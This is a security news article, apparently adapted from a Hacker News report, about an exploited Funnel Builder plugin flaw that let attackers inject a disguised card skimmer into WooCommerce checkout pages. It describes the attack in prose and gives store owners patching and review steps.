Funnel Builder Flaw Enables WooCommerce Checkout Skimming Attack

A serious security flaw in the Funnel Builder plugin for WordPress has been actively exploited to steal payment information from WooCommerce stores. Regarding Funnel Builder vulnerability, Attackers used the vulnerability to inject malicious code into checkout pages, potentially compromising customer credit card data.

The issue affects more than 40,000 WooCommerce stores that use Funnel Builder. However, the plugin developer FunnelKit has released a patch and worked with WordPress.org to automatically update vulnerable installations.

How the Attack Works

According to Sansec, a Dutch e-commerce security company, the vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into checkout pages. The flaw impacts all versions of Funnel Builder before 3.15.0.3.

The attack method is particularly sneaky. Bad actors plant fake Google Tag Manager scripts into the plugin’s External Scripts setting. These scripts look like normal analytics code sitting alongside legitimate tracking tags. However, they actually load a payment skimmer designed to steal sensitive information.

The stolen data includes credit card numbers, CVV codes, and billing addresses. Everything a customer enters during checkout becomes vulnerable to theft.

The Technical Breakdown

The root cause lies in how older versions of Funnel Builder handle requests. The plugin includes a publicly exposed checkout endpoint that processes incoming requests. This endpoint chooses which internal method to run based on the request.

Unfortunately, older versions never verified the caller’s permissions. They also did not limit which methods could be invoked. This created a significant security gap.

Attackers exploited this loophole by sending unauthenticated requests. These requests reached an internal method that writes data directly into the plugin’s global settings. No verification required.

Once attackers injected their malicious code, it appeared on every Funnel Builder checkout page. The planted script tags triggered on every checkout transaction across affected WordPress sites.

Real-World Attack Details

Sansec observed at least one case where attackers disguised their payload as a Google Tag Manager loader. This fake GTM code launched JavaScript from a remote domain controlled by the attackers.

The malicious script then established a WebSocket connection to the attacker’s command-and-control server. From there, it retrieved a customized skimmer tailored specifically to the victim’s storefront.

This approach is part of a recurring Magecart pattern. Security reviewers often skim past code that looks like familiar tracking tags. Therefore, disguising skimmers as Google Analytics or Tag Manager code helps them avoid detection.

Limited Impact Thanks to Quick Response

FunnelKit responded quickly after the first report. The company patched and released a fix within 36 hours. Additionally, they worked with the WordPress.org plugin team to automatically update existing installations.

The company also backported the fix to all earlier versions. They blocked known attacker domains at the DNS level to neutralize the attack vector completely.

According to FunnelKit, the overall impact appears limited. During the nine days following disclosure, monitoring covered more than 1,300 sites. Only three showed signs of compromise before mitigations took effect.

What You Need to Do

If you run a WooCommerce store with Funnel Builder, take these steps immediately. First, verify that your plugin has been updated to version 3.15.0.3 or later. Most sites should have received the automatic update through WordPress.org.

Next, review your settings carefully. Navigate to Settings > Checkout > External Scripts in your WordPress dashboard. Look for anything unfamiliar or suspicious. Remove any scripts you did not intentionally add.

Pay special attention to anything that looks like Google Tag Manager or Google Analytics code. While legitimate tracking scripts are common, attackers specifically disguise malicious code to look like these familiar tools.

Broader Security Context

This incident highlights ongoing challenges in WordPress security. Just weeks earlier, Sucuri detailed a campaign targeting Joomla websites with backdoors. Those attacks used heavily obfuscated PHP code to contact command-and-control servers.

The Joomla attacks served spammy content to visitors and search engines without site owner knowledge. Attackers leverage site reputation for injecting spam. The remote loader approach allows attackers to change compromised website behavior at any time.

These attacks share common characteristics. Both use legitimate-looking code to avoid detection. Both establish connections to remote servers for ongoing control. Both demonstrate how attackers continuously adapt their techniques.

Protection Going Forward

The Funnel Builder vulnerability has been patched and the active exploitation path closed. Stores running version 3.15.0.3 or later are no longer vulnerable to this specific issue.

However, this incident serves as an important reminder. Regular security monitoring remains essential for WooCommerce stores. Review your installed plugins regularly. Keep everything updated to the latest versions.

Consider implementing additional security measures. Use a web application firewall designed for WordPress. Monitor your checkout pages for unexpected code. Review External Scripts settings periodically as part of routine maintenance.

Most importantly, stay informed about security issues affecting your platform. Subscribe to security bulletins from your plugin developers. Follow WordPress security news sources that filter technical information into actionable guidance.

Original Source: thehackernews.com